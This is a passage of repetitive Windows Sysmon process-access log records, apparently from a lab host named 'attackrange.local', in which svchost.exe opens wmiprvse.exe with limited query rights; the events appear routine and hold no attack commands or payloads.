C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1095,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1096,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1097,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1098,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1099,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1100,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1101,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:04.756","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"648","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1102,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:04.756\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 648\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 